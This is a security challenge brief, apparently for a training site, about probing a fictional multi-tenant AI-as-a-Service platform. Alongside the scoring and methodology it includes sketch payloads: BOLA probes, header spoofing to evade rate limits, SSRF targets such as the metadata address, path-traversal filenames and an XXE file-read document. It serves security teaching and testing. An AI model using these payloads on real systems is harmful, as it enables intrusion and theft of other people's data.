June 2026: Cloud AI Security Challenge
Find and document vulnerabilities in a cloud-deployed AI service across API security, model serving infrastructure, authentication, and data handling. This challenge moves beyond prompt-level attacks to examine the infrastructure, APIs, and data flows of an AI application deployed on cloud infrastructure.
Challenge Overview
| Detail | Value |
|---|---|
| Duration | June 1--30, 2026 |
| Difficulty | Intermediate |
| Estimated Time | 6--10 hours |
| Prerequisites | Basic web application security knowledge, API testing experience, familiarity with cloud deployment concepts |
| Max Points | 100 |
Scenario
"AISaaS" is a fictional AI-as-a-Service platform that provides hosted language model endpoints to enterprise customers. The platform offers:
- A REST API for text generation, summarization, and classification
- A web-based playground for interactive model testing
- A dashboard for managing API keys, usage, and billing
- Multi-tenant model serving with per-customer configuration
- A file upload endpoint for document processing
You have been given a standard customer account. Your goal is to find vulnerabilities in the platform's security posture across multiple categories.
Target Environment
API Endpoints
| Endpoint | Purpose | Auth Required |
|---|---|---|
| POST /api/v1/generate | Text generation | API key |
| POST /api/v1/summarize | Document summarization | API key |
| POST /api/v1/classify | Text classification | API key |
| POST /api/v1/upload | File upload for processing | API key |
| GET /api/v1/usage | Usage statistics | API key |
| GET /api/v1/config | Model configuration | API key |
| POST /api/v1/config | Update configuration | API key |
| GET /dashboard/* | Web dashboard | Session cookie |
| POST /auth/login | Authentication | Credentials |
| POST /auth/token | API key generation | Session cookie |
Architecture
Client → API Gateway (rate limiting, auth) → Load Balancer → Model Serving Pods (GPU)
→ File Processing Workers
→ Config Service → Database
The platform runs on Kubernetes with:
- NGINX-based API gateway
- Redis for session management and caching
- PostgreSQL for user data, configurations, and billing
- S3-compatible object storage for uploaded files
- GPU nodes running vLLM for model serving
Objectives
Category 1: API Security (25 points)
1.1 Authentication Bypass (10 points)
Find a way to access API endpoints without valid authentication, or escalate from your API key to capabilities your account should not have.
- Look at how API keys are validated, how sessions are managed, and whether any unauthenticated endpoints expose sensitive data.
- Test for common API vulnerabilities: broken object-level authorization (BOLA), broken function-level authorization, mass assignment.
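A BOLA test usually starts by varying object identifiers in requests that should only return your own resources. The sketch below assumes a sequential integer customer ID and a hypothetical `customer_id` query parameter on the config endpoint; adjust both to whatever reconnaissance actually reveals.

```python
# Sketch of a BOLA (broken object-level authorization) probe.
# The ID scheme and the customer_id parameter are assumptions about
# the challenge target, not documented behavior.

def bola_candidates(own_id: int, spread: int = 5) -> list[int]:
    """Return nearby object IDs to try, excluding your own."""
    return [i for i in range(own_id - spread, own_id + spread + 1)
            if i != own_id and i > 0]

def probe_requests(base_url: str, api_key: str, own_id: int) -> list[dict]:
    """Build (not send) one GET request per candidate config object."""
    headers = {"Authorization": f"Bearer {api_key}"}
    return [{"method": "GET",
             "url": f"{base_url}/api/v1/config?customer_id={cid}",  # hypothetical parameter
             "headers": headers}
            for cid in bola_candidates(own_id)]
```

Send each built request (for example with the requests library) and compare status codes: a 200 with another customer's configuration, where a 403 was expected, is direct evidence of BOLA.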
1.2 Rate Limit Bypass (8 points)
Your account has a rate limit of 100 requests per minute. Find a way to exceed this limit.
- Consider how the rate limiter identifies clients. Is it based on API key, IP address, or something else? Can you manipulate the identifier?
- Look for endpoints that are not rate-limited or headers that influence rate-limiting behavior.
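One common misconfiguration behind proxies is keying the rate limiter on client-supplied headers such as `X-Forwarded-For`. The sketch below generates header sets that each claim a different source IP; which headers the gateway actually trusts (if any) is exactly what you are testing, and the extra header names are speculative additions to try.

```python
# Sketch: test whether the rate limiter trusts client-supplied headers.
# If requests are counted per X-Forwarded-For value, rotating that
# header may reset the per-client counter and bypass the 100 req/min cap.

def spoofed_header_sets(n: int) -> list[dict]:
    """One header dict per request, each claiming a different source IP."""
    sets = []
    for i in range(n):
        fake_ip = f"10.0.{i // 256}.{i % 256}"
        sets.append({
            "X-Forwarded-For": fake_ip,
            "X-Real-IP": fake_ip,         # also commonly trusted by proxies
            "X-Originating-IP": fake_ip,  # less common, worth trying
        })
    return sets
```

Send more than 100 requests within a minute, each with a different header set; if none are rejected with 429, the limiter is keyed on a spoofable identifier.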
1.3 Input Validation Flaws (7 points)
Find input validation vulnerabilities in the API. These could include:
- Server-side request forgery (SSRF) through the file upload or URL processing endpoints
- Path traversal through file handling
- Injection through model configuration parameters
- Oversized input handling
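For SSRF and traversal, a small payload list covers most first-pass tests. The metadata address 169.254.169.254 is the standard cloud instance-metadata endpoint; the Redis and PostgreSQL targets follow from the architecture described above. All of these are probes to submit through any URL- or filename-accepting parameter, not guaranteed hits.

```python
# Sketch payload lists for input-validation testing.

SSRF_TARGETS = [
    "http://169.254.169.254/latest/meta-data/",  # cloud instance metadata
    "http://localhost:6379/",                    # Redis (per the architecture)
    "http://127.0.0.1:5432/",                    # PostgreSQL
    "file:///etc/passwd",                        # scheme confusion
]

def traversal_filenames(depth: int = 4) -> list[str]:
    """Generate path-traversal filenames at increasing depths."""
    return ["../" * d + "etc/passwd" for d in range(1, depth + 1)]

# Encoded and filter-evasion variants worth trying alongside the above.
TRAVERSAL_VARIANTS = [
    "..%2f..%2f..%2fetc%2fpasswd",   # URL-encoded separators
    "....//....//etc/passwd",        # survives naive "../" stripping
]
```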
Category 2: Multi-Tenant Isolation (25 points)
2.1 Cross-Tenant Data Access (15 points)
Access data belonging to another customer of the platform. This could be:
- Another customer's generated outputs (cached responses)
- Another customer's model configuration
- Another customer's uploaded documents
- Another customer's usage data or API keys
2.2 Configuration Leakage (10 points)
Extract system-level configuration that should not be accessible to customers:
- Model serving parameters (GPU allocation, batch size, model version)
- Infrastructure details (internal hostnames, service endpoints, environment variables)
- Other customer account metadata
Category 3: Model Serving Security (25 points)
3.1 Model Endpoint Abuse (10 points)
Find ways to abuse the model serving infrastructure beyond normal usage:
- Prompt injection that causes the model to leak its serving configuration
- Requests that cause disproportionate resource consumption (denial of service)
- Inputs that trigger error messages revealing internal information
3.2 Inference Data Leakage (8 points)
Determine whether the model serving infrastructure leaks information across requests:
- Does the model's KV cache retain information from previous requests (by other users)?
- Do error messages or timing differences reveal information about the model or other users' inputs?
- Is there any cross-contamination between tenants sharing the same GPU nodes?
3.3 File Processing Vulnerabilities (7 points)
Exploit the file upload and processing pipeline:
- Upload files that trigger vulnerable parsing libraries
- Attempt path traversal through filenames or archive contents
- Test for XML external entity (XXE) injection through document formats
- Upload files that cause excessive resource consumption
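For the XXE test, a minimal probe document is enough to establish whether the target's XML parsers resolve external entities. The builder below targets `/etc/hostname` as an arbitrary low-risk file; whether the upload pipeline parses raw XML at all, or only XML embedded inside formats like DOCX or SVG, is something you have to determine by testing.

```python
# Sketch of a classic XXE probe document for the upload endpoint.

def xxe_payload(target_file: str = "/etc/hostname") -> str:
    """Build an XML document whose external entity expands to a local file."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE doc [\n'
        f'  <!ENTITY xxe SYSTEM "file://{target_file}">\n'
        ']>\n'
        '<doc>&xxe;</doc>\n'
    )
```

If the file's contents appear anywhere in the processing output or an error message, the parser resolves external entities and the finding is confirmed.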
Category 4: Data Handling (25 points)
4.1 Logging and Monitoring Gaps (10 points)
Identify gaps in the platform's security logging:
- Are failed authentication attempts logged?
- Are access control violations detected and logged?
- Can you perform actions that should be monitored but are not?
- Can you tamper with or evade audit logs?
4.2 Data Retention Issues (8 points)
Investigate how the platform handles data lifecycle:
- Are deleted files actually removed from storage?
- Do cached responses persist after the user's session ends?
- Is uploaded data properly isolated during processing?
- Can you access data that should have been purged?
4.3 Secrets Exposure (7 points)
Find exposed secrets in the platform:
- API keys or tokens in client-side code, error messages, or HTTP headers
- Database credentials or internal service tokens
- Debug endpoints or development artifacts left in production
- Information disclosure through HTTP response headers or error pages
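Secrets hunting is easier with a scanner over fetched JavaScript bundles and error pages. The patterns below are generic heuristics (the AWS-style `AKIA` prefix is a real convention; the others are loose catch-alls), not formats documented for this fictional platform.

```python
import re

# Sketch: flag credential-looking strings in client-side code or responses.

SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "bearer_token":   re.compile(r"(?i)bearer\s+[a-z0-9._-]{20,}"),
    "generic_key":    re.compile(
        r"(?i)(?:api[_-]?key|secret)['\"]?\s*[:=]\s*['\"][^'\"]{16,}['\"]"),
}

def scan_for_secrets(text: str) -> list[tuple[str, str]]:
    """Return (pattern_name, matched_string) pairs found in the text."""
    hits = []
    for name, pat in SECRET_PATTERNS.items():
        hits.extend((name, m.group(0)) for m in pat.finditer(text))
    return hits
```

Run it over every JavaScript file, sourcemap, and verbose error response you collect during reconnaissance; expect false positives and verify each hit manually.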
Tools and Approach
Recommended Tools
- Burp Suite or OWASP ZAP for intercepting and manipulating HTTP requests
- curl or httpie for API testing
- nmap or similar for service enumeration (only against the challenge target)
- jq for parsing JSON responses
- Python requests library for scripting automated tests
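A thin harness around the requests library keeps scripted tests consistent. The Bearer header scheme and the endpoint path are assumptions about the target; substitute the base URL and key issued with your account.

```python
import requests

# Minimal scripting harness for the challenge API (assumed auth scheme).

def make_session(api_key: str) -> requests.Session:
    """Session that attaches the API key to every request."""
    s = requests.Session()
    s.headers.update({
        "Authorization": f"Bearer {api_key}",
        "Content-Type": "application/json",
    })
    return s

def generate(session: requests.Session, base_url: str, prompt: str) -> requests.Response:
    """Call the text-generation endpoint (performs network I/O)."""
    return session.post(f"{base_url}/api/v1/generate", json={"prompt": prompt})
```

A shared `Session` also reuses connections, which matters when you later fire hundreds of requests for rate-limit or fuzzing tests.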
Methodology
Follow a structured approach:
- Reconnaissance. Map the API surface, identify all endpoints, and understand the authentication model.
- Authentication testing. Test for authentication bypasses, session management issues, and key handling flaws.
- Authorization testing. Test for horizontal and vertical privilege escalation at each endpoint.
- Input validation. Fuzz inputs for injection, overflow, and traversal vulnerabilities.
- Business logic. Test for logic flaws in billing, usage tracking, and configuration management.
- Infrastructure. Look for misconfigurations, exposed services, and information disclosure.
Scoring
| Objective | Points | Evidence Required |
|---|---|---|
| 1.1 Auth Bypass | 10 | Demonstration of unauthorized access |
| 1.2 Rate Limit Bypass | 8 | Proof of exceeding rate limit |
| 1.3 Input Validation | 7 | Vulnerability details and proof of concept |
| 2.1 Cross-Tenant Access | 15 | Evidence of another tenant's data |
| 2.2 Config Leakage | 10 | Extracted configuration details |
| 3.1 Model Endpoint Abuse | 10 | Demonstration of abuse |
| 3.2 Inference Leakage | 8 | Evidence of cross-request leakage |
| 3.3 File Processing | 7 | Proof-of-concept exploit |
| 4.1 Logging Gaps | 10 | Documentation of monitoring gaps |
| 4.2 Data Retention | 8 | Evidence of data lifecycle issues |
| 4.3 Secrets Exposure | 7 | Any discovered secrets |
Bonus Points (up to 10)
- Comprehensive vulnerability report following an industry-standard format (CVSS scoring, clear remediation guidance)
- Discovery of vulnerabilities not anticipated by the challenge designers
- Demonstration of attack chains combining multiple vulnerabilities
Submission Format
Submit a structured vulnerability report:
# Cloud AI Security Assessment - June 2026
## Executive Summary
[Brief overview of findings and risk assessment]
## Findings
### Finding 1: [Title]
- **Severity:** Critical/High/Medium/Low
- **Category:** [API Security/Multi-Tenant/Model Serving/Data Handling]
- **CVSS Score:** [if applicable]
#### Description
[What the vulnerability is]
#### Proof of Concept
[Step-by-step reproduction with exact requests/responses]
#### Impact
[What an attacker could achieve]
#### Remediation
[Specific fix recommendations]
Key Concepts
Cloud AI vs. Traditional Cloud Security
Cloud AI services share many vulnerabilities with traditional web applications, but they also have unique attack surfaces:
- Model serving infrastructure introduces GPU-specific concerns, including shared memory, batch processing across tenants, and KV cache management.
- Inference APIs must handle adversarial inputs that target both the application layer and the model layer simultaneously.
- Data pipelines for training and fine-tuning create additional surfaces for data poisoning and exfiltration.
- Cost models based on token usage create economic denial-of-service opportunities.
The AI Security Stack
This challenge covers the full stack of an AI deployment:
| Layer | Traditional Security | AI-Specific Concerns |
|---|---|---|
| Network | Firewall, segmentation | GPU cluster communication |
| Application | Auth, authz, input validation | Prompt injection, model abuse |
| Data | Encryption, access control | Training data, embeddings, model weights |
| Runtime | Container security, orchestration | Model serving, inference optimization |
| Monitoring | Logging, alerting | Prompt logging, output monitoring |
Approach Tips
Start with Passive Reconnaissance
Before sending any exploit payloads, map the attack surface thoroughly:
- Enumerate all API endpoints and their parameters using the documentation and by probing for undocumented endpoints
- Examine HTTP response headers for technology fingerprints (server software, framework versions, security headers)
- Check for client-side source code, JavaScript files, or API documentation that reveals internal structure
- Look for error messages that disclose stack traces, file paths, or configuration details
Passive reconnaissance costs nothing and reveals attack surface you would otherwise miss.
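Header fingerprinting in particular is easy to automate. The sketch below summarizes a captured response's headers; the disclosure and security-header lists are common conventions rather than an exhaustive standard.

```python
# Sketch: flag technology-disclosing headers and missing security headers.

DISCLOSURE_HEADERS = ["Server", "X-Powered-By", "X-AspNet-Version"]
EXPECTED_SECURITY_HEADERS = [
    "Strict-Transport-Security",
    "Content-Security-Policy",
    "X-Content-Type-Options",
]

def fingerprint(headers: dict) -> dict:
    """Summarize technology disclosure and absent security headers."""
    lower = {k.lower(): v for k, v in headers.items()}
    return {
        "disclosed": {h: lower[h.lower()] for h in DISCLOSURE_HEADERS
                      if h.lower() in lower},
        "missing": [h for h in EXPECTED_SECURITY_HEADERS
                    if h.lower() not in lower],
    }
```

Feed it the header dict from any HTTP client response; a `Server: nginx/1.x.y` disclosure, for instance, narrows which gateway CVEs are worth checking.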
Organize by Attack Surface, Not Technique
It is tempting to go through a checklist of techniques (SQL injection, XSS, SSRF) and try each one. A more effective approach is to organize by attack surface:
- Authentication surface. How is identity established? Test all authentication mechanisms.
- Authorization surface. How are permissions enforced? Test every endpoint for horizontal and vertical privilege escalation.
- Input processing surface. What inputs does the system accept? Test each input for injection, overflow, and format confusion.
- Data boundary surface. Where does data cross trust boundaries? Test for leakage at each boundary.
- Model interaction surface. Where does user input reach the model? Test for prompt injection and model-specific attacks.
This approach ensures comprehensive coverage because it maps to how the system is structured, not to how your toolkit is organized.
Document Everything
Cloud security assessments produce large volumes of evidence. Without organized documentation, you will:
- Forget which endpoints you tested and what the results were
- Waste time re-testing things you already checked
- Produce a report that is disorganized and hard to follow
Use a structured note-taking system from the start. For each endpoint you test, record: the request, the response, your interpretation, and whether it warrants further investigation.
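Those four fields map naturally onto a small record type. The sketch below serializes records as JSON Lines, which stays greppable and diffs cleanly; the field names are just one reasonable choice.

```python
from dataclasses import dataclass
import json

# Sketch of the per-endpoint test record suggested above.

@dataclass
class TestRecord:
    endpoint: str
    request: str         # the exact request sent
    response: str        # status line and relevant body excerpt
    interpretation: str  # what you think the result means
    follow_up: bool = False  # flag for further investigation

def to_jsonl(records: list) -> str:
    """Serialize records as one JSON object per line (JSON Lines)."""
    return "\n".join(json.dumps(vars(r)) for r in records)
```

Appending each record as you work means the proof-of-concept sections of your final report can be assembled directly from your notes.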
Think Like an Operator
Many cloud AI security issues are not traditional vulnerabilities but operational misconfigurations:
- Default credentials that were never changed
- Debug endpoints left enabled in production
- Overly permissive IAM roles granted during development and never tightened
- Logging gaps where security-relevant events are not captured
- Secrets in environment variables instead of a secrets manager
These issues are easy to find with systematic checking but easy to miss if you are only looking for traditional exploits.
Further Reading
- Cloud AI Security -- foundational concepts for this challenge
- Infrastructure & Supply Chain -- infrastructure security fundamentals
- LLMOps Security -- operational security for AI systems
- July 2026 Challenge -- the next challenge